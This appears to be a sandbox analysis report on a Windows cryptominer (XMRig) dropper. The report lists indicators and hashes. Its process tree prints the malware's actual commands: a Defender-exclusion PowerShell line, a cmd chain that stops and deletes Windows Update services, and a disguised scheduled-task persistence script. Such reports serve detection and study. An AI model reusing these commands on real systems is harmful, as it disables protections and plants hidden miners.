Analysis
-
max time kernel
300s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
24-10-2022 04:03
Static task
static1
Behavioral task
behavioral1
Sample
feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe
Resource
win7-20220812-en
General
-
Target
feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe
-
Size
344KB
-
MD5
95230f05deb43f0adc402b128e331a9f
-
SHA1
2f732066b25f6c38b6d34d8cd5230cb0105aac9b
-
SHA256
feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb
-
SHA512
9fb99707ecb76268c6319b6f791fbb98b03e6fb86e26187c484df9c4cb2a255a7688aa5878b27c8c7ac2f31ddb44c36db2093002e0f01532862fb6753ebf662f
-
SSDEEP
6144:mq6LFGh9VxSaYmn9EqgJ/kQ4yuoohqXaySzv9oM6MAq:mnwnW4EqNyuooeaySzVos
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
setup.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/360-188-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/360-189-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
setup.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts setup.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
Processes:
setup.exeupdater.exepid process 1272 setup.exe 588 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/360-188-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/360-189-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 2 IoCs
Processes:
RegSvcs.exetaskeng.exepid process 1460 RegSvcs.exe 552 taskeng.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\setup.exe themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral1/memory/1272-74-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-75-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-77-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-78-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-82-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-81-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-79-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida behavioral1/memory/1272-83-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral1/memory/1272-120-0x000000013F6B0000-0x00000001403A9000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/588-135-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-136-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-137-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-138-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-139-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-140-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-141-0x000000013F820000-0x0000000140519000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/588-181-0x000000013F820000-0x0000000140519000-memory.dmp themida behavioral1/memory/588-186-0x000000013F820000-0x0000000140519000-memory.dmp themida -
Processes:
setup.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
setup.exeupdater.exepid process 1272 setup.exe 588 updater.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exeupdater.exedescription pid process target process PID 2044 set thread context of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 588 set thread context of 1556 588 updater.exe conhost.exe PID 588 set thread context of 360 588 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
setup.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1628 sc.exe 1256 sc.exe 1620 sc.exe 1572 sc.exe 1076 sc.exe 2020 sc.exe 1224 sc.exe 952 sc.exe 1588 sc.exe 1660 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1524 schtasks.exe 1532 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f07ce8fb6ee7d801 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 1876 powershell.exe 1284 powershell.exe 1092 powershell.exe 996 powershell.exe 1228 powershell.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe 360 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exeWMIC.execonhost.exedescription pid process Token: SeDebugPrivilege 1876 powershell.exe Token: SeShutdownPrivilege 1592 powercfg.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeShutdownPrivilege 1068 powercfg.exe Token: SeShutdownPrivilege 880 powercfg.exe Token: SeShutdownPrivilege 300 powercfg.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeShutdownPrivilege 1568 powercfg.exe Token: SeShutdownPrivilege 836 powercfg.exe Token: SeShutdownPrivilege 1548 powercfg.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeShutdownPrivilege 112 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1148 WMIC.exe Token: SeIncreaseQuotaPrivilege 1148 WMIC.exe Token: SeSecurityPrivilege 1148 WMIC.exe Token: SeTakeOwnershipPrivilege 1148 WMIC.exe Token: SeLoadDriverPrivilege 1148 WMIC.exe Token: SeSystemtimePrivilege 1148 WMIC.exe Token: SeBackupPrivilege 1148 WMIC.exe Token: SeRestorePrivilege 1148 WMIC.exe Token: SeShutdownPrivilege 1148 WMIC.exe Token: SeSystemEnvironmentPrivilege 1148 WMIC.exe Token: SeUndockPrivilege 1148 WMIC.exe Token: SeManageVolumePrivilege 1148 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1148 WMIC.exe Token: SeIncreaseQuotaPrivilege 1148 WMIC.exe Token: SeSecurityPrivilege 1148 WMIC.exe Token: SeTakeOwnershipPrivilege 1148 WMIC.exe Token: SeLoadDriverPrivilege 1148 WMIC.exe Token: SeSystemtimePrivilege 1148 WMIC.exe Token: SeBackupPrivilege 1148 WMIC.exe Token: SeRestorePrivilege 1148 WMIC.exe Token: SeShutdownPrivilege 1148 WMIC.exe Token: SeSystemEnvironmentPrivilege 1148 WMIC.exe Token: SeUndockPrivilege 1148 WMIC.exe Token: SeManageVolumePrivilege 1148 WMIC.exe Token: SeLockMemoryPrivilege 360 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exeRegSvcs.exesetup.execmd.execmd.exedescription pid process target process PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 2044 wrote to memory of 1460 2044 feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe RegSvcs.exe PID 1460 wrote to memory of 1272 1460 RegSvcs.exe setup.exe PID 1460 wrote to memory of 1272 1460 RegSvcs.exe setup.exe PID 1460 wrote to memory of 1272 1460 RegSvcs.exe setup.exe PID 1272 wrote to memory of 1876 1272 setup.exe powershell.exe PID 1272 wrote to memory of 1876 1272 setup.exe powershell.exe PID 1272 wrote to memory of 1876 1272 setup.exe powershell.exe PID 1272 wrote to memory of 1504 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1504 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1504 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1224 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1224 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1224 1272 setup.exe cmd.exe PID 1272 wrote to memory of 1284 1272 setup.exe powershell.exe PID 1272 wrote to memory of 1284 1272 setup.exe powershell.exe PID 1272 wrote to memory of 1284 1272 setup.exe powershell.exe PID 1504 wrote to memory of 952 1504 cmd.exe sc.exe PID 1504 wrote to memory of 952 1504 cmd.exe sc.exe PID 1504 wrote to memory of 952 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1620 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1620 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1620 1504 cmd.exe sc.exe PID 1224 wrote to memory of 1592 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 1592 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 1592 1224 cmd.exe powercfg.exe PID 1504 wrote to memory of 1588 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1588 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1588 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1660 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1660 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1660 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1572 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1572 1504 cmd.exe sc.exe PID 1504 wrote to memory of 1572 1504 cmd.exe sc.exe PID 1224 wrote to memory of 1068 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 1068 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 1068 1224 cmd.exe powercfg.exe PID 1504 wrote to memory of 1776 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1776 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1776 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1184 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1184 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1184 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1568 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1568 1504 cmd.exe reg.exe PID 1504 wrote to memory of 1568 1504 cmd.exe reg.exe PID 1504 wrote to memory of 772 1504 cmd.exe reg.exe PID 1504 wrote to memory of 772 1504 cmd.exe reg.exe PID 1504 wrote to memory of 772 1504 cmd.exe reg.exe PID 1224 wrote to memory of 880 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 880 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 880 1224 cmd.exe powercfg.exe PID 1504 wrote to memory of 1076 1504 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe"C:\Users\Admin\AppData\Local\Temp\feab1a440d731ecca4c1c09f3a6d5c0207816eb77967fa0396fbcf16d059fdfb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lkntrxaxo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD5B4D74-1509-468A-A2DF-0801F85655A6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tnsgzmlqv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dusipgdp3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe yvlyxjfdxdcidxwf GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1pmYVvkjJN4HofKGCqATpWU9EnXlzYLkPxSmgsIYJU043⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD53c307d96de8b5ae76bd3b331aa4a81d5
SHA135d314121f180ea37dfdebc28c463f2d21bf1be3
SHA25677e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7
SHA5120a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD53c307d96de8b5ae76bd3b331aa4a81d5
SHA135d314121f180ea37dfdebc28c463f2d21bf1be3
SHA25677e8ce0b2cdea0703a8c29af3656baeacf141add0fe7bba671040c1c552fbda7
SHA5120a7bf0fcc847564177bf888b5e271c109b64dcf860f85af3d58e1d9f4431ec58927bf14aef09d51c17b441b65215d4d269e863b7610f73278daca2114089ce14
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.1MB
MD58420df05dccb9604b2322809929b938b
SHA1d905b00e2f5c0cbbfe683ee3683b1756c95ea929
SHA25699aac284662b947222d4083dff6dfeb8a002770b6249f189fafb4613f6c08515
SHA512b5a92b5d56cabc5eae4b1d2be9b25e5c54fc1be6ada6731eb4905251c7ca82fa00d2f054437142279469cef140e032544d9c4137bac36466a6fddd50834e7f57
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.1MB
MD58420df05dccb9604b2322809929b938b
SHA1d905b00e2f5c0cbbfe683ee3683b1756c95ea929
SHA25699aac284662b947222d4083dff6dfeb8a002770b6249f189fafb4613f6c08515
